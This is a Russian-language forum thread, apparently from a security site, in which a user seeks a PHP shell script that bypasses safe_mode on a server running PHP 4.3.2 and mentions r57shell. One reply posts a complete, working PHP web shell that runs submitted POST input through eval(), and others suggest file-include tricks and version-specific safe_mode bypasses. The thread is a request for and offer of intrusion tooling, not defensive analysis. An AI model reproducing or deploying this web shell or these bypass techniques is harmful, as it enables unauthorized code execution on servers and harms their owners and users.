Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
php shell с обходом safe mod, Какие есть?
 
Нужен скрипт, который выполняет shell-команды  именно на php с обходом safe mod.

Кроме r57shell есть что-то стоящее?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Поищи в архиве ][акера. Скрипт не найдёшь - зато есть описания как это делается....
 
<?php
$shell=get_magic_quotes_gpc();
if (!empty($_POST['code']) ) {
$code=$shell ? stripslashes($_POST['code']) : $_POST['code'];
} else {
$code=NULL;
}
echo"
Enter code to execute in php eval();
<form action='' method='POST'>
<textarea cols='80' rows='25' name='code' id='code'>
$code
</textarea>
<br>
<br>
<input type='submit' value='Execute'>
</form>
<br><hr><br> "
;
if (!is_null($code)) eval($code);
?>
 
GreShNicK,
php eval в safe mode не работает!
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
ну пусть скрипт сздает фал в разрешенной директории, и incluide-ет его...
 
Phoenix,

это даст мне возможность читать файлы. А как насчёт остальных команд? Какие им альтарнативы?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Цитата
Furius Angel пишет:
Поищи в архиве ][акера. Скрипт не найдёшь - зато есть описания как это делается....

Ещё раз повторяю... Там целая статья была.
 
Цитата
Shanker пишет:
Phoenix,

это даст мне возможность читать файлы. А как насчёт остальных команд? Какие им альтарнативы?
Это даст тебе ровно то что разрешено в сейфмоде.
Однако различные версии PHP имебют различные уязвимости обхода сейфмода... тт уже по врсии PHP смотреть надо...
 
Цитата
Furius Angel пишет:
Ещё раз повторяю... Там целая статья была.
Не про это ли речь?
Смотрел я. Толку мало. Почти ничего не сработало. От r57 shell и то толку больше.

Вот кстати наткнулся на очень хорошую вещь - возможность листинга фйлов/папок: http://www.securitylab.ru/forum/read.php?FID=16&TID=21260&MID=209183&phrase_id=79748

Но всё-равно пока неясно как команды выполнять...

Цитата
Phoenix пишет:
Однако различные версии PHP имебют различные уязвимости обхода сейфмода... тт уже по врсии PHP смотреть надо...
Да, видел, пролетают в багтраках сообщения. Но во-первых, они очень малоинформационные, а во-вторых я на php кодить не умею. Разве что самое примитивное сваяю... И более или менее глядя на код догоняю его суть интуитивно. Хотя, хорошая возможность изучить php...

На серваке стоит PHP/4.3.2
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
Страницы: 1
Читают тему